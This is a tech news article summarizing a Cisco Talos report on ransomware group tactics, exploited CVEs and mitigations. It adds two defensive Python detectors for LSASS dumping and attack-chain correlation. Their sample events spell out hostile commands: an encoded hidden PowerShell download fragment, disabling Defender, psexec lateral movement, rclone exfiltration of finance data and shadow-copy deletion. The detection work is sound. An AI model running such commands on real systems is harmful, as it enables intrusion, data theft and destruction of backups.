Cisco Talos Report Reveals Critical Insights in Ransomware Trends

Cisco Talos Intelligence has published a detailed analysis of ransomware tactics, techniques, and procedures (TTPs) used by prominent ransomware groups. Learn more about the report and critical insights needed to protect potential targets.

July 15, 2024


  • Cisco Talos Intelligence recently published a report on prominent ransomware groups’ tactics, techniques, and procedures.
  • The report covered 14 ransomware groups active between 2023 and 2024, offering vital insights into existing ransomware strategies and recommendations for risk mitigation.

Ransomware attacks are increasingly common, and understanding the strategies utilized by malicious actors is vital to maintaining a robust cybersecurity posture. Cisco Talos Intelligence recently published a comprehensive report analyzing the tactics, techniques, and procedures of 14 major ransomware groups, shedding light on strategies and offering critical mitigation recommendations.

Key Insights

  • Initial access: Ransomware groups typically gain an initial foothold through phishing or by exploiting known vulnerabilities, especially in public-facing applications, and then move laterally to extend their reach within the network.
  • Defense evasion: Attackers disable or modify security software, obfuscate code, and use legitimate tools such as PowerShell and Windows Management Instrumentation so that their activity blends in with routine administration. This makes it hard for security solutions to distinguish malicious from legitimate activity.
  • Credential access: Attackers frequently dump credentials from Local Security Authority Subsystem Service (LSASS) memory, then use them to move laterally to critical systems while appearing to be legitimate users.
  • Command and control: Legitimate remote monitoring and management (RMM) tools let attackers control compromised systems while evading detection. Because such tools are often permitted in organizations, their use by ransomware operators rarely stands out.

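A detection example, written for this article rather than taken from the Talos report, that shows how the LSASS access pattern above can be spotted in endpoint telemetry: it decodes the access mask from Sysmon Event ID 10 (ProcessAccess) records, ignores an assumed allow-list of processes that legitimately read LSASS, and inspects the call stack for injected code and the MiniDump API. The record format, the allow-list and the sample events are all constructed.

```python
"""Flag suspicious LSASS process-access events (Sysmon Event ID 10).

Added example; it is not Talos' detection logic. The sample records are
constructed in a simplified 'Key=Value; Key=Value' form, with field names
taken from Sysmon's Event ID 10 schema.
"""
import re

# Process access rights (Win32 API) that memory-dumping tools need.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000   # enough for Task Manager-style queries

# Assumed allow-list of processes that legitimately read LSASS memory.
# Tune per environment and always match on the full, lower-cased path.
BENIGN_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Call-stack indicators: frames in unbacked memory (injected code) and the
# MiniDump implementation used by comsvcs.dll and procdump-style tools.
UNBACKED_FRAME = re.compile(r"\bUNKNOWN\b", re.IGNORECASE)
MINIDUMP_FRAME = re.compile(r"\\(dbgcore|dbghelp)\.dll\+", re.IGNORECASE)


def parse_event(line):
    """Parse one 'Key=Value; Key=Value' record into a dict."""
    fields = {}
    for part in line.strip().split(";"):
        key, _, value = part.strip().partition("=")
        fields[key] = value
    fields["GrantedAccess"] = int(fields.get("GrantedAccess", "0"), 16)
    return fields


def assess(event):
    """Return the reasons an event looks like LSASS credential theft ([] if none)."""
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return []
    source = event.get("SourceImage", "").lower()
    if source in BENIGN_SOURCES:
        return []
    reasons = []
    mask = event["GrantedAccess"]
    if mask & PROCESS_VM_READ:
        reasons.append(f"opens LSASS with PROCESS_VM_READ (GrantedAccess=0x{mask:X})")
    trace = event.get("CallTrace", "")
    if UNBACKED_FRAME.search(trace):
        reasons.append("call stack passes through unbacked memory (injected code)")
    if MINIDUMP_FRAME.search(trace):
        reasons.append("call stack goes through the MiniDump API (dbgcore/dbghelp)")
    return reasons


def detect_lsass_access(lines):
    """Return [(source image, [reasons]), ...] for every suspicious record."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings.append((event["SourceImage"], reasons))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # Defender's engine reading LSASS: allow-listed.
    r"SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe; "
    r"TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1010; "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Program Files\Windows Defender\mpengine.dll+4a1b2",
    # A service querying basic process information only: no memory read.
    r"SourceImage=C:\Windows\System32\svchost.exe; "
    r"TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1000; "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\KERNELBASE.dll+2b6e8",
    # Unsigned binary in a temp directory reading LSASS from injected code.
    r"SourceImage=C:\Users\jdoe\AppData\Local\Temp\update.exe; "
    r"TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1010; "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(000001A2B3C4D5E6)",
    # rundll32 with full access and dbgcore on the stack: comsvcs MiniDump pattern.
    r"SourceImage=C:\Windows\System32\rundll32.exe; "
    r"TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1FFFFF; "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\SYSTEM32\dbgcore.DLL+1a3f2|C:\Windows\System32\comsvcs.dll+1b7c3",
]

if __name__ == "__main__":
    for source, reasons in detect_lsass_access(SAMPLE_EVENTS):
        print(source)
        for reason in reasons:
            print("  -", reason)
```

The access-mask check is the part worth keeping even if the rest is replaced by a vendor rule: a query-only mask (0x1000) is routine, whereas any mask that includes PROCESS_VM_READ from a process outside the allow-list is what credential dumping needs. The call-stack checks raise confidence but are not required to alert.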

Prominent Ransomware Groups

The following are some of the prominent ransomware groups identified by the study.

  • ALPHV/BlackCat and Rhysida: Known for their wide range of TTPs, these groups are highly adaptive and often tailor their attacks to the target environment.
  • Black Basta and LockBit: These groups are notorious for aggressive tactics that focus on encrypting data and disrupting systems to maximize the pressure on victims to pay.
  • Clop: Unlike most of the others, Clop was found to engage primarily in data theft and extortion, and does not always encrypt its victims’ data. The group focuses on exfiltrating sensitive information and threatening to publish it if the ransom is not paid.

Exploited Vulnerabilities

Despite the vast number of vulnerabilities disclosed each month, ransomware groups were found to concentrate on a small set of known, high-impact flaws that remain unpatched in victim environments:

  • CVE-2018-13379: A path traversal flaw in the FortiOS SSL VPN web portal that lets an unauthenticated attacker read system files, including session files containing VPN credentials, and so gain access to the network.
  • CVE-2020-1472 (Zerologon): A flaw in the Netlogon authentication protocol that lets an attacker with network access to a domain controller reset its machine account password and escalate to domain administrator, making it a prime target for attackers aiming to control an entire network.
  • CVE-2023-0669: A pre-authentication remote code execution flaw in the administration console of Fortra’s GoAnywhere MFT file-transfer software, which attackers can use to take over the affected server.

Typical Ransomware Attack Chains

According to the report, a typical ransomware attack chain involves several stages:

  • Initial access: Access is often gained through malicious attachments, phishing emails, or vulnerabilities in public-facing applications.
  • Execution: Malicious payloads are executed on the victim’s machine, often through scripts or malicious documents.
  • Persistence: The attacker establishes persistence by adding registry entries, setting up scheduled tasks, or using legitimate tools.
  • Privilege escalation: Attackers escalate their privileges to gain higher-level access, on the host and then within the network.
  • Credential access: Techniques like credential dumping from LSASS memory are used to obtain authentication details.
  • Lateral movement: Attackers move laterally across the network to identify and access critical systems.
  • Data exfiltration: Sensitive data is exfiltrated before the encryption process begins.
  • Impact: The ransomware is deployed to encrypt data and render systems inoperable, with decryption offered only in exchange for the ransom.

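The stages above rarely produce one clean alert; each leaves a low-confidence event, and the signal is in the chain. The following correlator, an added example that is not part of the Talos report, classifies constructed Sysmon-style events into attack-chain stages with illustrative rules and alerts when one host accumulates three or more distinct stages within an hour. The rule patterns, hostnames and event fields are assumptions made for the example.

```python
"""Correlate endpoint events into ransomware attack-chain stages, per host.

Added example, not taken from the Talos report. Events are constructed
Sysmon-style records; the rule regexes are illustrative, not a complete ruleset.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (stage, Sysmon event ID, field to inspect, case-insensitive regex)
RULES = [
    ("execution", 1, "CommandLine", r"powershell.*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}"),
    ("persistence", 1, "CommandLine", r"schtasks(\.exe)?\s+/create"),
    ("persistence", 13, "TargetObject", r"\\currentversion\\run\\"),
    ("defense_evasion", 1, "CommandLine", r"set-mppreference.*-disablerealtimemonitoring\s+\$?true"),
    ("credential_access", 10, "TargetImage", r"\\lsass\.exe$"),
    ("lateral_movement", 1, "CommandLine", r"^(psexec|paexec)(\.exe)?\s|wmic\s+/node:|winrs\s+-r:"),
    ("exfiltration", 1, "Image", r"\\(rclone|megasync)\.exe$"),
    ("impact", 1, "CommandLine", r"vssadmin(\.exe)?\s+delete\s+shadows"),
]


def classify(event):
    """Return the set of attack-chain stages one event matches."""
    stages = set()
    for stage, eid, field, pattern in RULES:
        if event["eid"] == eid and re.search(pattern, event.get(field, ""), re.IGNORECASE):
            stages.add(stage)
    return stages


def correlate(events, window_minutes=60, min_stages=3):
    """Per host, find the time window holding the most distinct stages and
    alert when it reaches min_stages. Returns {host: [stages, first-seen order]}."""
    by_host = defaultdict(list)
    for ev in events:
        stages = classify(ev)
        if stages:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), stages))
    window = timedelta(minutes=window_minutes)
    alerts = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda hit: hit[0])
        best = []
        for i, (start, _) in enumerate(hits):      # slide the window over each hit
            seen = []
            for when, stages in hits[i:]:
                if when - start > window:
                    break
                for stage in sorted(stages):
                    if stage not in seen:
                        seen.append(stage)
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_stages:
            alerts[host] = best
    return alerts


# Constructed sample telemetry (not real data). WS-042 is the compromised
# workstation; FS-01 sees only two stages; WS-017 is a lone admin task.
SAMPLE_EVENTS = [
    {"host": "WS-042", "time": "2024-07-10T09:00:12", "eid": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"host": "WS-042", "time": "2024-07-10T09:05:40", "eid": 1,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc onlogon /tn "Updater" /tr C:\Users\Public\upd.exe'},
    {"host": "WS-042", "time": "2024-07-10T09:12:00", "eid": 1,          # benign noise
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"host": "WS-042", "time": "2024-07-10T09:20:03", "eid": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS-042", "time": "2024-07-10T09:31:55", "eid": 10,
     "SourceImage": r"C:\Users\Public\upd.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"host": "WS-042", "time": "2024-07-10T09:50:21", "eid": 1,
     "Image": r"C:\Users\Public\psexec.exe",
     "CommandLine": r"psexec.exe \\FS-01 -s cmd.exe"},
    {"host": "FS-01", "time": "2024-07-10T10:10:00", "eid": 1,
     "Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Finance remote:dump"},
    {"host": "FS-01", "time": "2024-07-10T10:40:30", "eid": 1,
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS-017", "time": "2024-07-10T08:00:00", "eid": 1,
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks.exe /create /sc daily /tn Backup /tr backup.bat"},
    {"host": "WS-017", "time": "2024-07-10T08:02:10", "eid": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backup"},
]

if __name__ == "__main__":
    for host, chain in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {' -> '.join(chain)}")
```

Only WS-042 alerts with the defaults: a scheduled task on its own (WS-017) is routine administration, and FS-01 shows two stages, which a lower threshold would catch. The window and threshold are the tuning knobs; shrinking the window to twenty minutes still surfaces the first three stages on WS-042, which is the point at which a responder would want to look before credentials are dumped.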
Mitigation Strategies

The report also covered some of the more important best practices that can help organizations minimize the risk of being impacted by a ransomware attack:

  • Patch management: Administrators must update systems regularly, prioritizing the high-impact flaws that attackers are known to target.
  • Password policies and MFA: Strong passwords and multi-factor authentication (MFA) should be enforced to reduce the risk of unauthorized access and credential theft.
  • System hardening: Unnecessary services should be disabled and secure configuration baselines applied to reduce the overall attack surface.
  • Network segmentation: Sensitive data and systems should be isolated to limit lateral movement and contain the impact of a breach.
  • Continuous monitoring: Organizations should deploy Endpoint Detection and Response (EDR/XDR) and Security Information and Event Management (SIEM) solutions to detect and respond to suspicious activity in real time.
  • Least privilege: Restrict each account to the access it needs, minimizing the damage a compromised account can do.
  • Cut IT exposure: Reduce the number of public-facing services, since each one is a potential entry point.

Takeaways

The report by Cisco Talos highlights the growing sophistication of modern ransomware groups’ methods and the need for stringent security measures. Implementing the mitigation strategies above reduces both the likelihood of a successful attack and the damage one can do. You can find the full report here.

Anuj Mudaliar

Assistant Editor - Tech, SWZD